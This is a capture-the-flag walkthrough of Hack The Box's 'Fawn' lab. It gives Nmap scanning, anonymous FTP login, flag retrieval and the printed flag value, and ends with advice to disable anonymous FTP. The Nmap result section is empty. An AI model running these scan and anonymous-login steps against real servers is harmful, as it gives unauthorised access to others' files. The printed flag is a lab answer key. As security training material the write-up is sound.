Fawn – Hack The Box
by
🧠 Summary
Hack The Box’s Fawn is a very easy Linux machine that demonstrates the security risk of enabling anonymous FTP login. We will connect to the HTB network, enumerate services using Nmap, log in to FTP without credentials, and retrieve the flag.
🛠️ Tools Used
- OpenVPN – To connect to HTB labs
- Ping – For connectivity check
- Nmap – For service enumeration
- FTP Client – For file download via anonymous login
🖥️ Target Info
- IP:
10.129.170.179 - OS: Unix
- Service: FTP (vsftpd 3.0.3)
- Difficulty: Very Easy
- Tags: FTP, Protocols, Reconnaissance, Anonymous/Guest Access
🚀 Steps to Root
1. Connect to HTB VPN
Download your .ovpn file from HTB and run:
sudo openvpn file-name.ovpn
2. Scan with Nmap
Run an Nmap scan to find open ports and services:
nmap -sV -Pn 10.129.170.179
Result:
3. Connect via FTP (Anonymous Login)
Connect to the FTP service:
ftp 10.129.170.179
When prompted (FTP’s default username is anonymous not root!):
Name: anonymous
Password: (press Enter)
4. List Files and Download Flag
Inside the FTP session:
ls -la
get flag.txt
bye
Then view the flag:
cat flag.txt
Flag:
035db21c881520061c53e0536e44f815
Key Takeaways
- Anonymous FTP access is a critical misconfiguration because it allows anyone to read or upload files without authentication.
- FTP transmits credentials in plaintext, making it insecure.
- Always disable anonymous FTP access and use SFTP or SCP for secure transfers.